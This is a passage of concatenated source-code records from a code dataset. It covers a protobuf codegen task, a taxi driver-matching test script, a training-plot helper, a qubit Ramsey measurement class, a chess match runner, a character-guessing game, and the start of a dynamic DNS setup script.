JarLibrary,\n jars=import_jars,\n derived_from=target)\n # Add in the 'spec-rjars' target, which contains all the JarDependency targets passed in via the\n # imports parameter. Each of these jars is expected to contain .proto files bundled together\n # with their .class files.\n deps.add(jars_tgt)\n tgt = self.context.add_new_target(address,\n JavaLibrary,\n derived_from=target,\n sources=genfiles,\n provides=target.provides,\n dependencies=deps,\n excludes=target.payload.get_field_value('excludes'))\n for dependee in dependees:\n dependee.inject_dependency(tgt.address)\n return tgt\n\n def _create_python_target(self, target, dependees):\n genfiles = []\n for source in target.sources_relative_to_source_root():\n path = os.path.join(target.target_base, source)\n genfiles.extend(calculate_genfiles(path, source).get('py', []))\n spec_path = os.path.relpath(self.py_out, get_buildroot())\n address = SyntheticAddress(spec_path, target.id)\n tgt = self.context.add_new_target(address,\n PythonLibrary,\n derived_from=target,\n sources=genfiles,\n dependencies=self.pythondeps)\n tgt.jar_dependencies.update(target.imports)\n for dependee in dependees:\n dependee.inject_dependency(tgt.address)\n return tgt\n\n\nDEFAULT_PACKAGE_PARSER = re.compile(r'^\\s*package\\s+([^;]+)\\s*;\\s*$')\nOPTION_PARSER = re.compile(r'^\\s*option\\s+([^ =]+)\\s*=\\s*([^\\s]+)\\s*;\\s*$')\nSERVICE_PARSER = re.compile(r'^\\s*(service)\\s+([^\\s{]+).*')\nTYPE_PARSER = re.compile(r'^\\s*(enum|message)\\s+([^\\s{]+).*')\n\n\ndef camelcase(string):\n \"\"\"Convert snake casing where present to camel casing\"\"\"\n return ''.join(word.capitalize() for word in re.split('[-_]', string))\n\n\ndef calculate_genfiles(path, source):\n with open(path, 'r') as protobuf:\n lines = protobuf.readlines()\n package = ''\n filename = re.sub(r'\\.proto$', '', os.path.basename(source))\n outer_class_name = camelcase(filename)\n multiple_files = False\n outer_types = set()\n type_depth = 0\n java_package = None\n for line in lines:\n match = DEFAULT_PACKAGE_PARSER.match(line)\n if match:\n package = match.group(1)\n else:\n match = OPTION_PARSER.match(line)\n if match:\n name = match.group(1)\n value = match.group(2).strip('\"')\n if 'java_package' == name:\n java_package = value\n elif 'java_outer_classname' == name:\n outer_class_name = value\n elif 'java_multiple_files' == name:\n multiple_files = (value == 'true')\n else:\n uline = line.decode('utf-8').strip()\n type_depth += uline.count('{') - uline.count('}')\n match = SERVICE_PARSER.match(line)\n _update_type_list(match, type_depth, outer_types)\n if not match:\n match = TYPE_PARSER.match(line)\n _update_type_list(match, type_depth, outer_types)\n\n # 'option java_package' supercedes 'package'\n if java_package:\n package = java_package\n\n # TODO(Eric Ayers) replace with a real lex/parse understanding of protos. This is a big hack.\n # The parsing for finding type definitions is not reliable. See\n # https://github.com/pantsbuild/pants/issues/96\n types = outer_types if multiple_files and type_depth == 0 else set()\n\n genfiles = defaultdict(set)\n genfiles['py'].update(calculate_python_genfiles(source))\n genfiles['java'].update(calculate_java_genfiles(package, outer_class_name, types))\n return genfiles\n\n\ndef _update_type_list(match, type_depth, outer_types):\n if match and type_depth < 2: # This takes care of the case where { } are on the same line.\n type_name = match.group(2)\n outer_types.add(type_name)\n if match.group(1) == 'message':\n outer_types.add('%sOrBuilder' % type_name)\n\n\ndef calculate_python_genfiles(source):\n yield re.sub(r'\\.proto$', '_pb2.py', source)\n\n\ndef calculate_java_genfiles(package, outer_class_name, types):\n basepath = package.replace('.', '/')\n\n def path(name):\n return os.path.join(basepath, '%s.java' % name)\n\n yield path(outer_class_name)\n for type_ in types:\n yield path(type_)\n","sub_path":"src/python/pants/backend/codegen/tasks/protobuf_gen.py","file_name":"protobuf_gen.py","file_ext":"py","file_size_in_byte":14333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"528949648","text":"import time\nfrom random import randint\n\nfrom cb_taxi import (\n Trip,\n TripConfig,\n Driver\n)\n\n##### Initialize Trip Config #####\nTRIP_CONFIG = TripConfig()\n# Override config defaults\n# TRIP_CONFIG.set_base_fare(5)\n\n##### Initialize Trip Instances #####\n\n# Trip to Match - 1\nTRIP_TO_MATCH_1 = Trip(\n config=TRIP_CONFIG,\n start_node=(7.0495, 125.5907),\n end_node=(7.0517, 125.5903),\n seats_reserved=2,\n)\n\n# Trip to Match - 2\nTRIP_TO_MATCH_2 = Trip(\n config=TRIP_CONFIG,\n start_node=(7.0739938, 125.6126872),\n end_node=(7.0753224, 125.6132193),\n seats_reserved=2,\n)\n\n# Matching Trip (SM to Gaisano)\n# Sample route: https://www.openstreetmap.org/directions?engine=fossgis_osrm_car&route=7.0493%2C125.5885%3B7.0777%2C125.6140#map=15/7.0632/125.6002\nTRIP_MATCHING = Trip(\n config=TRIP_CONFIG,\n start_node=(7.0493, 125.5885),\n end_node=(7.0777, 125.6140),\n seats_reserved=2,\n)\n\n# Mismatching Trip - 1\nTRIP_MISMATCHING_1 = Trip(\n config=TRIP_CONFIG,\n start_node=(7.0581343, 125.5685814),\n end_node=(7.0571582, 125.5721307),\n seats_reserved=1,\n)\n\n# Mismatching Trip - 2\nTRIP_MISMATCHING_2 = Trip(\n config=TRIP_CONFIG,\n start_node=(7.0606491, 125.5640547),\n end_node=(7.0619090, 125.5611702),\n seats_reserved=1,\n)\n\n##### Initialize Driver Instances #####\n## This is a list where we can select a\n## driver to assign for our trip to match\nDRIVERS = []\n\n# SM Ecoland -> Gaisano Bajada (Matching Driver) - can accommodate MATCHING_TRIPS\nMATCHING_DRIVER = Driver(\n unique_id=randint(1000, 9999),\n current_location=(7.0491888, 125.5893258),\n is_online=True,\n available_seats=4,\n current_trip=TRIP_MATCHING\n)\n\n# Other Drivers (Mismatching Drivers)\nMISMATCHING_DRIVER_1 = Driver(\n unique_id=randint(1000, 9999),\n current_location=(7.0649960, 125.6017195),\n is_online=True,\n available_seats=4,\n current_trip=TRIP_MISMATCHING_1\n)\n\nMISMATCHING_DRIVER_2 = Driver(\n unique_id=randint(1000, 9999),\n current_location=(7.0649960, 125.6017195),\n is_online=True,\n available_seats=4,\n current_trip=TRIP_MISMATCHING_2\n)\n\n# Idle drivers\nIDLE_DRIVER_1 = Driver(\n unique_id=randint(1000, 9999),\n current_location=(7.0649960, 125.6017195),\n is_online=True,\n available_seats=5,\n current_trip=False\n)\n\nIDLE_DRIVER_2 = Driver(\n unique_id=randint(1000, 9999),\n current_location=(7.0491888, 125.5893258),\n is_online=True,\n available_seats=5,\n current_trip=False\n)\n\nDRIVERS.append(MATCHING_DRIVER)\nDRIVERS.append(MISMATCHING_DRIVER_1)\nDRIVERS.append(MISMATCHING_DRIVER_2)\nDRIVERS.append(IDLE_DRIVER_1)\nDRIVERS.append(IDLE_DRIVER_2)\n\n\n##### Display Drivers #####\nprint(\"\\nDRIVERS\")\nprint(\"--------------------------\")\nfor driver in DRIVERS:\n print(\"ID: {}; Location: {}; Seats Available: {}; Online: {}\".format(\n driver.unique_id,\n driver.current_location,\n driver.available_seats,\n driver.is_online\n ))\nprint(\"\\n\")\n##### TEST MODULE #####\n\nprint(\"TRIP TO MATCH DETAILS\")\nprint(\"--------------------------\")\nprint(\"Pickup: {}; DropOff: {}; Seats Reserved: {}\".format(\n TRIP_TO_MATCH_1.start_node,\n TRIP_TO_MATCH_1.end_node,\n TRIP_TO_MATCH_1.seats_reserved\n))\n\nFARE_TO_PAY_1 = TRIP_TO_MATCH_1.get_fare()\nprint(\"Fare to Pay: ${}\".format(FARE_TO_PAY_1))\n\n## GET AVAILABLE DRIVERS FOR TRIP_TO_MATCH_1 ##\nAVAILABLE_DRIVERS = TRIP_TO_MATCH_1.get_available_drivers(DRIVERS)\n\nprint(\"\\nAvailable Drivers: \")\nfor driver in AVAILABLE_DRIVERS:\n distance = round(driver.get_distance(\n TRIP_TO_MATCH_1.start_node[0],\n TRIP_TO_MATCH_1.start_node[1]\n ), 2)\n print(\"ID: {}; Location: {}; Distance: {}; Seats Available: {}; Current Trip: {} TO {}\".format(\n driver.unique_id,\n driver.current_location,\n \"{}km\".format(distance),\n driver.available_seats,\n driver.current_trip.start_node,\n driver.current_trip.end_node\n ))\n\n\n## SELECT FROM THE LIST OF AVAILABLE DRIVERS THRU QUEUING ##\nQUEUE_TIME = TRIP_CONFIG.process_time # seconds\nQUEUE_END = time.time() + QUEUE_TIME\ndriver_found = False\nfor driver in AVAILABLE_DRIVERS:\n if time.time() <= QUEUE_END:\n print(\"Accept Request? Y/N\")\n response = input()\n if response.upper() == \"Y\":\n driver_found = True\n TRIP_TO_MATCH_1.driver = driver\n break\n else:\n break\n\nif not driver_found and time.time() <= QUEUE_END:\n # IF NO DRIVER ACCEPTED THE RESPONSE,\n # INITIATE SEARCH FOR NEARBY IDLE DRIVERS\n ONLINE_DRIVERS = TRIP_TO_MATCH_1.get_online_drivers(DRIVERS)\n IDLE_DRIVERS = TRIP_TO_MATCH_1.get_idle_drivers(ONLINE_DRIVERS)\n print(\"\\nSELECTING FROM IDLE DRIVERS:\")\n for driver in IDLE_DRIVERS:\n print(\"Accept Request? Y/N\")\n response = input()\n if response.upper() == \"Y\":\n driver_found = True\n TRIP_TO_MATCH_1.driver = driver\n break\n\nif driver_found:\n print(\"\\nFinal Assigned Driver:\")\n\n distance = round(TRIP_TO_MATCH_1.driver.get_distance(\n TRIP_TO_MATCH_1.start_node[0],\n TRIP_TO_MATCH_1.start_node[1]\n ), 2)\n\n if TRIP_TO_MATCH_1.driver.current_trip:\n print(\"ID: {}; Location: {}; Distance: {}; Seats Available: {}; Current Trip: {} TO {}\".format(\n TRIP_TO_MATCH_1.driver.unique_id,\n TRIP_TO_MATCH_1.driver.current_location,\n \"{}km\".format(distance),\n TRIP_TO_MATCH_1.driver.available_seats,\n TRIP_TO_MATCH_1.driver.current_trip.start_node,\n TRIP_TO_MATCH_1.driver.current_trip.end_node\n ))\n else:\n print(\"ID: {}; Location: {}; Distance: {}; Seats Available: {}; Trip: No Ongoing Trip\".format(\n TRIP_TO_MATCH_1.driver.unique_id,\n TRIP_TO_MATCH_1.driver.current_location,\n \"{}km\".format(distance),\n TRIP_TO_MATCH_1.driver.available_seats,\n ))\nelse:\n print(\"No driver found for this trip.\")\n\n\n##### MISC FUNCTIONS #####\n\n# Get the node value of a lat/long pair\n# NODE_VALUE = TRIP_TO_MATCH_1.get_node(7.0649960, 125.6017195)\n","sub_path":"tests/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":6073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"449048185","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport argparse\nimport json\n\ndef plot_accuracies(losses, accuracy_train, accuracy_test, accuracy_per_label, labels):\n ax = plt.subplot(111)\n ax.plot(losses, color='r', label=\"loss\")\n ax.plot(accuracy_test, color='b', label=\"test accuracy\")\n ax.plot(accuracy_train, color='y', label=\"train accuracy\")\n\n ax.legend()\n plt.show()\n ax = plt.subplot(111)\n for i in range(len(accuracy_per_label)):\n ax.plot(accuracy_per_label[i], label=labels[i])\n ax.legend()\n plt.show()\n\ndef main():\n parser = argparse.ArgumentParser(description='Display plot outputs from training')\n parser.add_argument('plotdata',\n metavar='P',\n type=str,\n nargs='?',\n default='./plots/plot_data.json',\n help=\"The path to the plot data\")\n args = parser.parse_args()\n\n with tf.gfile.FastGFile(args.plotdata, 'r') as f:\n plot_data = json.loads(f.read())\n\n plot_accuracies(**plot_data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"train/trainer/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"78856461","text":"# -*- coding: utf-8 -*-\n\"\"\"Measure Ramsey oscillations by changing the delay between two π/2 pulses.\n\nFit detuning of control drive frequency from qubit, and T2*. The control pulse has a sin^2 envelope, while the readout\npulse is square.\n\n\"\"\"\nimport ast\nfrom typing import List\n\nimport h5py\nimport numpy as np\n\nfrom presto.hardware import AdcFSample, AdcMode, DacFSample, DacMode\nfrom presto import pulsed\nfrom presto.utils import rotate_opt, sin2\n\nfrom _base import Base\n\nDAC_CURRENT = 32_000 # uA\nCONVERTER_CONFIGURATION = {\n \"adc_mode\": AdcMode.Mixed,\n \"adc_fsample\": AdcFSample.G4,\n \"dac_mode\": [DacMode.Mixed42, DacMode.Mixed02, DacMode.Mixed02, DacMode.Mixed02],\n \"dac_fsample\": [DacFSample.G10, DacFSample.G6, DacFSample.G6, DacFSample.G6],\n}\nIDX_LOW = 1_500\nIDX_HIGH = 2_000\n\n\nclass RamseySingle(Base):\n def __init__(\n self,\n readout_freq: float,\n control_freq: float,\n readout_amp: float,\n control_amp: float,\n readout_duration: float,\n control_duration: float,\n sample_duration: float,\n delay_arr: List[float],\n readout_port: int,\n control_port: int,\n sample_port: int,\n wait_delay: float,\n readout_sample_delay: float,\n num_averages: int,\n jpa_params: dict = None,\n drag: float = 0.0,\n ) -> None:\n self.readout_freq = readout_freq\n self.control_freq = control_freq\n self.readout_amp = readout_amp\n self.control_amp = control_amp\n self.readout_duration = readout_duration\n self.control_duration = control_duration\n self.sample_duration = sample_duration\n self.delay_arr = np.atleast_1d(delay_arr).astype(np.float64)\n self.readout_port = readout_port\n self.control_port = control_port\n self.sample_port = sample_port\n self.wait_delay = wait_delay\n self.readout_sample_delay = readout_sample_delay\n self.num_averages = num_averages\n self.jpa_params = jpa_params\n self.drag = drag\n\n self.t_arr = None # replaced by run\n self.store_arr = None # replaced by run\n\n def run(\n self,\n presto_address: str,\n presto_port: int = None,\n ext_ref_clk: bool = False,\n ) -> str:\n # Instantiate interface class\n with pulsed.Pulsed(\n address=presto_address,\n port=presto_port,\n ext_ref_clk=ext_ref_clk,\n **CONVERTER_CONFIGURATION,\n ) as pls:\n assert pls.hardware is not None\n\n pls.hardware.set_adc_attenuation(self.sample_port, 0.0)\n pls.hardware.set_dac_current(self.readout_port, DAC_CURRENT)\n pls.hardware.set_dac_current(self.control_port, DAC_CURRENT)\n pls.hardware.set_inv_sinc(self.readout_port, 0)\n pls.hardware.set_inv_sinc(self.control_port, 0)\n pls.hardware.configure_mixer(\n freq=self.readout_freq,\n in_ports=self.sample_port,\n out_ports=self.readout_port,\n sync=False, # sync in next call\n )\n pls.hardware.configure_mixer(\n freq=self.control_freq,\n out_ports=self.control_port,\n sync=True, # sync here\n )\n if self.jpa_params is not None:\n pls.hardware.set_lmx(\n self.jpa_params[\"pump_freq\"],\n self.jpa_params[\"pump_pwr\"],\n self.jpa_params[\"pump_port\"],\n )\n pls.hardware.set_dc_bias(self.jpa_params[\"bias\"], self.jpa_params[\"bias_port\"])\n pls.hardware.sleep(1.0, False)\n\n # ************************************\n # *** Setup measurement parameters ***\n # ************************************\n\n # Setup lookup tables for frequencies\n # we only need to use carrier 1\n pls.setup_freq_lut(\n output_ports=self.readout_port,\n group=0,\n frequencies=0.0,\n phases=0.0,\n phases_q=0.0,\n )\n pls.setup_freq_lut(\n output_ports=self.control_port,\n group=0,\n frequencies=0.0,\n phases=0.0,\n phases_q=0.0,\n )\n\n # Setup lookup tables for amplitudes\n pls.setup_scale_lut(\n output_ports=self.readout_port,\n group=0,\n scales=self.readout_amp,\n )\n pls.setup_scale_lut(\n output_ports=self.control_port,\n group=0,\n scales=self.control_amp,\n )\n\n # Setup readout and control pulses\n # use setup_long_drive to create a pulse with square envelope\n # setup_long_drive supports smooth rise and fall transitions for the pulse,\n # but we keep it simple here\n readout_pulse = pls.setup_long_drive(\n output_port=self.readout_port,\n group=0,\n duration=self.readout_duration,\n amplitude=1.0,\n amplitude_q=1.0,\n rise_time=0e-9,\n fall_time=0e-9,\n )\n control_ns = int(\n round(self.control_duration * pls.get_fs(\"dac\"))\n ) # number of samples in the control template\n control_envelope = sin2(control_ns, drag=self.drag)\n control_pulse = pls.setup_template(\n output_port=self.control_port,\n group=0,\n template=control_envelope,\n template_q=control_envelope if self.drag == 0.0 else None,\n envelope=True,\n )\n\n # Setup sampling window\n pls.set_store_ports(self.sample_port)\n pls.set_store_duration(self.sample_duration)\n\n # ******************************\n # *** Program pulse sequence ***\n # ******************************\n T = 0.0 # s, start at time zero ...\n for delay in self.delay_arr:\n # first pi/2 pulse\n pls.reset_phase(T, self.control_port)\n pls.output_pulse(T, control_pulse)\n T += self.control_duration\n # Ramsey delay\n T += delay\n # second pi/2 pulse\n pls.output_pulse(T, control_pulse)\n T += self.control_duration\n # Readout\n pls.reset_phase(T, self.readout_port)\n pls.output_pulse(T, readout_pulse)\n pls.store(T + self.readout_sample_delay)\n T += self.readout_duration\n # Move to next iteration, waiting for decay\n T += self.wait_delay\n\n if self.jpa_params is not None:\n # adjust period to minimize effect of JPA idler\n idler_freq = self.jpa_params[\"pump_freq\"] - self.readout_freq\n idler_if = abs(idler_freq - self.readout_freq) # NCO at readout_freq\n idler_period = 1 / idler_if\n T_clk = int(round(T * pls.get_clk_f()))\n idler_period_clk = int(round(idler_period * pls.get_clk_f()))\n # first make T a multiple of idler period\n if T_clk % idler_period_clk > 0:\n T_clk += idler_period_clk - (T_clk % idler_period_clk)\n # then make it off by one clock cycle\n T_clk += 1\n T = T_clk * pls.get_clk_T()\n\n # **************************\n # *** Run the experiment ***\n # **************************\n pls.run(\n period=T,\n repeat_count=1,\n num_averages=self.num_averages,\n print_time=True,\n )\n self.t_arr, self.store_arr = pls.get_store_data()\n\n if self.jpa_params is not None:\n pls.hardware.set_lmx(0.0, 0.0, self.jpa_params[\"pump_port\"])\n pls.hardware.set_dc_bias(0.0, self.jpa_params[\"bias_port\"])\n\n return self.save()\n\n def save(self, save_filename: str = None) -> str:\n return super().save(__file__, save_filename=save_filename)\n\n @classmethod\n def load(cls, load_filename: str) -> \"RamseySingle\":\n with h5py.File(load_filename, \"r\") as h5f:\n readout_freq = h5f.attrs[\"readout_freq\"]\n control_freq = h5f.attrs[\"control_freq\"]\n readout_amp = h5f.attrs[\"readout_amp\"]\n control_amp = h5f.attrs[\"control_amp\"]\n readout_duration = h5f.attrs[\"readout_duration\"]\n control_duration = h5f.attrs[\"control_duration\"]\n sample_duration = h5f.attrs[\"sample_duration\"]\n delay_arr = h5f[\"delay_arr\"][()]\n readout_port = h5f.attrs[\"readout_port\"]\n control_port = h5f.attrs[\"control_port\"]\n sample_port = h5f.attrs[\"sample_port\"]\n wait_delay = h5f.attrs[\"wait_delay\"]\n readout_sample_delay = h5f.attrs[\"readout_sample_delay\"]\n num_averages = h5f.attrs[\"num_averages\"]\n\n jpa_params = ast.literal_eval(h5f.attrs[\"jpa_params\"])\n\n t_arr = h5f[\"t_arr\"][()]\n store_arr = h5f[\"store_arr\"][()]\n\n try:\n drag = h5f.attrs[\"drag\"]\n except KeyError:\n drag = 0.0\n\n self = cls(\n readout_freq=readout_freq,\n control_freq=control_freq,\n readout_amp=readout_amp,\n control_amp=control_amp,\n readout_duration=readout_duration,\n control_duration=control_duration,\n sample_duration=sample_duration,\n delay_arr=delay_arr,\n readout_port=readout_port,\n control_port=control_port,\n sample_port=sample_port,\n wait_delay=wait_delay,\n readout_sample_delay=readout_sample_delay,\n num_averages=num_averages,\n jpa_params=jpa_params,\n drag=drag,\n )\n self.t_arr = t_arr\n self.store_arr = store_arr\n\n return self\n\n def analyze(self, all_plots: bool = False):\n if self.t_arr is None:\n raise RuntimeError\n if self.store_arr is None:\n raise RuntimeError\n\n import matplotlib.pyplot as plt\n\n ret_fig = []\n\n idx = np.arange(IDX_LOW, IDX_HIGH)\n t_low = self.t_arr[IDX_LOW]\n t_high = self.t_arr[IDX_HIGH]\n\n if all_plots:\n # Plot raw store data for first iteration as a check\n fig1, ax1 = plt.subplots(2, 1, sharex=True, tight_layout=True)\n ax11, ax12 = ax1\n ax11.axvspan(1e9 * t_low, 1e9 * t_high, facecolor=\"#dfdfdf\")\n ax12.axvspan(1e9 * t_low, 1e9 * t_high, facecolor=\"#dfdfdf\")\n ax11.plot(1e9 * self.t_arr, np.abs(self.store_arr[0, 0, :]))\n ax12.plot(1e9 * self.t_arr, np.angle(self.store_arr[0, 0, :]))\n ax12.set_xlabel(\"Time [ns]\")\n fig1.show()\n ret_fig.append(fig1)\n\n # Analyze T2\n resp_arr = np.mean(self.store_arr[:, 0, idx], axis=-1)\n data = rotate_opt(resp_arr)\n\n # Fit data to I quadrature\n try:\n popt, perr = _fit_simple(self.delay_arr, np.real(data))\n\n T2 = popt[2]\n T2_err = perr[2]\n print(\"T2 time: {} +- {} us\".format(1e6 * T2, 1e6 * T2_err))\n det = popt[3]\n det_err = perr[3]\n print(\"detuning: {} +- {} Hz\".format(det, det_err))\n\n success = True\n except Exception as err:\n print(\"Unable to fit data!\")\n print(err)\n success = False\n\n if all_plots:\n fig2, ax2 = plt.subplots(4, 1, sharex=True, figsize=(6.4, 6.4), tight_layout=True)\n ax21, ax22, ax23, ax24 = ax2\n ax21.plot(1e6 * self.delay_arr, np.abs(data))\n ax22.plot(1e6 * self.delay_arr, np.unwrap(np.angle(data)))\n ax23.plot(1e6 * self.delay_arr, np.real(data))\n if success:\n ax23.plot(1e6 * self.delay_arr, _func(self.delay_arr, *popt), \"--\")\n ax24.plot(1e6 * self.delay_arr, np.imag(data))\n\n ax21.set_ylabel(\"Amplitude [FS]\")\n ax22.set_ylabel(\"Phase [rad]\")\n ax23.set_ylabel(\"I [FS]\")\n ax24.set_ylabel(\"Q [FS]\")\n ax2[-1].set_xlabel(\"Ramsey delay [us]\")\n fig2.show()\n ret_fig.append(fig2)\n\n data_max = np.abs(data.real).max()\n unit = \"\"\n mult = 1.0\n if data_max < 1e-6:\n unit = \"n\"\n mult = 1e9\n elif data_max < 1e-3:\n unit = \"μ\"\n mult = 1e6\n elif data_max < 1e0:\n unit = \"m\"\n mult = 1e3\n\n fig3, ax3 = plt.subplots(tight_layout=True)\n ax3.plot(1e6 * self.delay_arr, mult * np.real(data), \".\")\n ax3.set_ylabel(f\"I quadrature [{unit:s}FS]\")\n ax3.set_xlabel(\"Ramsey delay [μs]\")\n if success:\n ax3.plot(1e6 * self.delay_arr, mult * _func(self.delay_arr, *popt), \"--\")\n ax3.set_title(f\"T2* = {1e6*T2:.0f} ± {1e6*T2_err:.0f} μs\")\n fig3.show()\n ret_fig.append(fig3)\n\n return ret_fig\n\n\ndef _func(t, offset, amplitude, T2, frequency, phase):\n return offset + amplitude * np.exp(-t / T2) * np.cos(2.0 * np.pi * frequency * t + phase)\n\n\ndef _fit_simple(x, y):\n from scipy.optimize import curve_fit\n\n pkpk = np.max(y) - np.min(y)\n offset = np.min(y) + pkpk / 2\n amplitude = 0.5 * pkpk\n T2 = 0.5 * (np.max(x) - np.min(x))\n freqs = np.fft.rfftfreq(len(x), x[1] - x[0])\n fft = np.fft.rfft(y)\n fft[0] = 0\n idx_max = np.argmax(np.abs(fft))\n frequency = freqs[idx_max]\n phase = np.angle(fft[idx_max])\n p0 = (\n offset,\n amplitude,\n T2,\n frequency,\n phase,\n )\n popt, pcov = curve_fit(\n _func,\n x,\n y,\n p0=p0,\n )\n perr = np.sqrt(np.diag(pcov))\n return popt, perr\n","sub_path":"ramsey_single.py","file_name":"ramsey_single.py","file_ext":"py","file_size_in_byte":14147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418701756","text":"from chess.chess import ChessBoard\nfrom vnet import Network\nfrom agent import Agent\nfrom tools import version\nfrom MCTS import Node\nimport numpy as np\n\n\ndef match(agent0, agent1, stdout=False):\n\t_, x, o = 0, -1, 1\n\tboard = np.array([[_, _, _, _, _, _, _, _],\n\t [_, _, x, _, _, _, _, _],\n\t [x, x, _, o, x, _, _, _],\n\t [x, x, o, x, x, _, x, _],\n\t [x, o, x, o, x, x, o, _],\n\t [x, o, o, x, x, x, x, x],\n\t [x, o, o, o, x, o, _, _],\n\t [_, _, x, o, x, x, _, _]])\n\tboard = ChessBoard(board)\n\troot0, root1 = Node(), Node()\n\tcurrent_player = 1\n\twhile not board.is_finish():\n\t\tagent = agent0 if current_player == -1 else agent1\n\t\troot = root0 if current_player == -1 else root1\n\t\tif stdout:\n\t\t\tagent.analysis(board, current_player)\n\t\tprint('root:', root.N)\n\t\taction = agent.play(board, current_player, root=root)\n\t\tboard.move(action, current_player)\n\t\troot0.move_root(action)\n\t\troot1.move_root(action)\n\t\tif stdout:\n\t\t\tprint('x' if current_player == -1 else 'o')\n\t\t\tboard.out()\n\t\t\tprint('=============================')\n\t\tcurrent_player = -current_player\n\treturn board\n\n\ndef contest(agent0, agent1, match_number=100):\n\twin_cnt = 0\n\t_agent0, _agent1 = agent0, agent1\n\tfor cnt in range(match_number):\n\t\t_agent0, _agent1 = _agent1, _agent0\n\t\tif _agent0 == agent0:\n\t\t\tprint('x')\n\t\telse:\n\t\t\tprint('o')\n\t\tboard = match(_agent0, _agent1)\n\t\tv = board.evaluate()\n\t\twinner = None if not v else _agent0 if v < 0 else _agent1\n\t\tif winner == agent0:\n\t\t\twin_cnt += 1\n\t\tprint('contest %d %.3f' % (cnt + 1, win_cnt / (cnt + 1)))\n\treturn win_cnt / match_number\n\n\ndef main():\n\tnet0 = Network('train', bn_training=False, use_GPU=False)\n\tnet0.restore()\n\tnet1 = Network('vnet' + version(6), bn_training=False, use_GPU=False)\n\tnet1.restore()\n\tagent0 = Agent(net0)\n\tagent1 = Agent(net1)\n\t# contest(agent0, agent0)\n\tmatch(agent0, agent0, stdout=True)\n\n\n# contest(agent0, agent1)\n\n\nif __name__ == '__main__':\n\tmain()\n# profile.run('main()', sort=1)\n","sub_path":"match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"511647786","text":"from PIL import Image\nimport os\n\nattr = \\\n {\n \"Sex?(M/F)\": [\"M\",\"F\"],\n \"Eye Color?\": [\"brown\",\"blue\"],\n \"Hair color?\": [\"dark\",\"blonde\"],\n \"Shirt color?\": [\"white\",\"blue\",\"yellow\",\"pink\",\"red\"],\n \"Ethinicity?\": [\"white\",\"black\"],\n \"Profession?\": [\"doctor\",\"carpenter\",\"student\",\"cook\",\"dancer\",\"soccer player\",\"police\",\"gaming\",\"none\"]\n }\ncharInfo = [\n [1,\"F\", \"dark\", \"brown\", \"white\", \"white\", \"doctor\"],\n [2,\"M\", \"dark\", \"blue\", \"blue\", \"white\", \"carpenter\"],\n [3,\"M\", \"blonde\", \"brown\", \"blue\", \"white\", \"none\"],\n [4,\"M\", \"blonde\", \"blue\", \"yellow\", \"white\", \"student\"],\n [5,\"F\", \"blonde\", \"blue\", \"pink\", \"white\", \"cook\"],\n [6,\"F\", \"blonde\", \"blue\", \"white\", \"white\", \"none\"],\n [7,\"F\", \"dark\", \"blue\", \"pink\", \"white\", \"dancer\"],\n [8,\"F\", \"dark\", \"brown\", \"red\", \"black\", \"none\"],\n [9,\"M\", \"dark\", \"brown\", \"red\", \"black\", \"soccer player\"],\n [10,\"M\", \"blonde\", \"blue\", \"blue\", \"white\", \"police\"],\n [11,\"M\", \"dark\", \"blue\", \"blue\", \"white\", \"gaming\"],\n [12,\"F\", \"blonde\", \"brown\", \"blue\", \"white\", \"none\"]\n ]\n\n\ndef askQuestions():\n qs = attr.copy()\n sub = charInfo.copy()\n while sub.__len__() > 1:\n count = 1\n for q,a in qs.items():\n print(str(count) + '.' + q)\n count = count+1\n print('Pick a question to answer!')\n qnum = input('>')\n qnum = int(qnum)-1\n foundQ = list(qs.keys())[qnum]\n\n for j in qs[foundQ]:\n toCompare = [y for x in sub for y in x]\n if j in toCompare:\n ans = input('>'+j.capitalize()+'?')\n if ans == 'Y' or ans == 'y':\n if j in qs[foundQ]:\n sub = [per for per in sub if j in per]\n del qs[foundQ]\n break\n\n print(sub)\n img = Image.open(os.path.dirname(__file__)+\"/\"+str(sub[0][0]) + '.jpg')\n img.show()\n\n\n\n# img = mpimg.imread(sub[0][0] + '.jpg')\n# imgplot = plt.imshow(img)\n# plt.show()\n\naskQuestions()\n","sub_path":"phase2.py","file_name":"phase2.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"565336709","text":"import json\nimport os.path\nimport sys\n\nimport requests\nfrom domainconnect import DomainConnect, DomainConnectAsyncCredentials\nfrom builtins import input\nimport webbrowser\n\ndc = DomainConnect()\n\n\ndef main(domain, settings='settings.txt'):\n # get Domain Connect config\n try:\n config = dc.get_domain_config(domain)\n except NoDomainConnectRecordException or NoDomainConnectSettingsException:\n return \"Domain doesn't support Domain Connect.\"\n\n # form consent url\n params = {\n 'IP': '0.0.0.0'\n }\n if config.providerName.lower() in ['godaddy', 'secureserver']:\n context = dc.get_domain_connect_template_async_context(\n domain=domain,\n provider_id='domainconnect.org',\n service_id_in_path=True,\n service_id='dynamicdns',\n params=params,\n redirect_uri='https://dynamicdns.domainconnect.org/ddnscode'\n )\n else:\n context = dc.get_domain_connect_template_async_context(\n domain=domain,\n provider_id='domainconnect.org',\n service_id=['dynamicdns',],\n params=params,\n redirect_uri='https://dynamicdns.domainconnect.org/ddnscode'\n )\n\n webbrowser.open(context.asyncConsentUrl, autoraise=True)\n code = input(\"Please open\\n{}\\nand provide us the access code:\".format(context.asyncConsentUrl))\n\n tries = 1\n while not code and tries < 4:\n tries += 1\n code = input(\"Access code cannot be empty. Please retry: \")\n if not code:\n return \"Could not setup domain without an access code.\"\n\n context.code = code\n context = dc.get_async_token(context, DomainConnectAsyncCredentials(\n client_id='domainconnect.org',\n client_secret='inconceivable',\n api_url=config.urlAPI\n ))\n\n # store domain settings\n mode = 'r+'\n if not os.path.exists(settings):\n mode = 'w+'\n with open(settings, mode) as settings_file:\n try:\n existing_config = 